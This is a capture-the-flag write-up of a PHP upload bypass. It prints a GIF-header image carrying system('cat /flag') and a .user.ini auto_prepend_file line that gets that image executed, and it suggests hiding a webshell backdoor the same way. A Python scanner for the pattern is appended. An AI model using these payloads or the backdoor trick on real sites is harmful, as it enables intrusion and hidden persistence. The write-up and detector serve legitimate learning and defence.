0x01 Challenge description
Opening the web page shows a file upload form.
1. We first try to upload a PHP file; the response reports a wrong file name suffix.
2. We try to upload a picture.
Here we can guess that exif_imagetype() is the function used to judge whether the file is a picture. This is easy to bypass: add a picture header at the start of the file, for example the GIF header GIF89a.
3. We add PHP code to the picture.
The picture is not allowed to contain <?, so we try to bypass the check with other statements:
<script language="php">xxx</script>
<% xxx %>
<? xxx ?>
0x02 Summary of the approach
1. The uploaded file cannot contain <?
2. The uploaded file must contain a picture header
Solution: we first upload a .user.ini, which makes PHP parse the code inside the picture, and that bypasses the restrictions.
Upload the picture a.gif, with the following content:
GIF89a
<script language='php'>system('cat /flag');</script>
Upload .user.ini, with the following content:
GIF89a
auto_prepend_file=a.gif
The auto_prepend_file=a.gif directive means that every PHP file in the current folder will include a.gif.
0x03 Answer
After uploading the two files, we directly access index.php in the upload directory.
The challenge deliberately places a PHP file that people can access in the upload directory, so it can include the picture code I uploaded, but in reality such instances are rare.
0x04 Possibility of using .user.ini in practice
As described above, using .user.ini requires the following conditions:
- The server scripting language is PHP
- The server uses CGI / FastCGI mode
- The upload directory contains an executable PHP file
From this point of view, .user.ini has a wider range of application than .htaccess; after all, .htaccess can only be used with Apache.
But on closer scrutiny, "the upload directory must contain an executable PHP file" is a fairly demanding requirement for a file upload: there should be no genius developers who upload files into the home directory or put PHP files into the upload folder.
But it is not hopeless: combined with other vulnerabilities, depending on the actual situation, it may work wonders. Some time ago I met a CMS that did not check for ../ in the upload path, so files could be uploaded to any directory; in that case .user.ini is very likely to be usable.
In addition, .user.ini should be a good way to hide a backdoor: leave a .user.ini and our image webshell in a directory that contains PHP files, and the backdoor is hidden.
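
A defender's view of the two uploads described above, as an added example that is not part of the original write-up: a Python scanner that walks an upload directory and flags .user.ini files setting auto_prepend_file or auto_append_file, and files that start with an image header but contain one of the PHP opening forms listed in 0x01. The function names and the sample files are constructed for illustration.

```python
import os
import re
import tempfile

# Directives that make PHP include another file for every script in the directory.
INI_DIRECTIVE = re.compile(rb"^\s*(auto_prepend_file|auto_append_file)\s*=\s*(\S+)", re.M | re.I)
# PHP opening forms listed in the write-up: <?, <% and <script language=php>.
PHP_TAG = re.compile(rb"<\?|<%|<script[^>]*language\s*=\s*[\"']?php", re.I)
IMAGE_MAGIC = (b"GIF87a", b"GIF89a", b"\xff\xd8\xff", b"\x89PNG\r\n\x1a\n")


def scan_upload_dir(root):
    """Return sorted (relative_path, reason) findings for files under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read(1 << 20)  # the first 1 MiB is enough for this check
            rel = os.path.relpath(path, root)
            if name.lower() == ".user.ini":
                for m in INI_DIRECTIVE.finditer(data):
                    key, val = m.group(1).decode().lower(), m.group(2).decode(errors="replace")
                    findings.append((rel, "ini sets %s=%s" % (key, val)))
            elif data.startswith(IMAGE_MAGIC) and PHP_TAG.search(data):
                findings.append((rel, "image header followed by PHP tag"))
    return sorted(findings)


def demo():
    """Build a constructed upload directory mirroring the write-up and scan it."""
    with tempfile.TemporaryDirectory() as root:
        samples = {  # constructed sample files, harmless payload
            "a.gif": b"GIF89a\n<script language='php'>echo 1;</script>\n",
            ".user.ini": b"GIF89a\nauto_prepend_file=a.gif\n",
            "clean.gif": b"GIF89a" + b"\x00" * 32,
            "index.php": b"<?php echo 'hello';\n",
        }
        for name, body in samples.items():
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(body)
        return scan_upload_dir(root)


if __name__ == "__main__":
    for rel, reason in demo():
        print(rel, "->", reason)
```

Treat the image findings as leads to review rather than verdicts: legitimate images that carry XMP metadata contain a `<?xpacket` marker and will match the `<?` pattern.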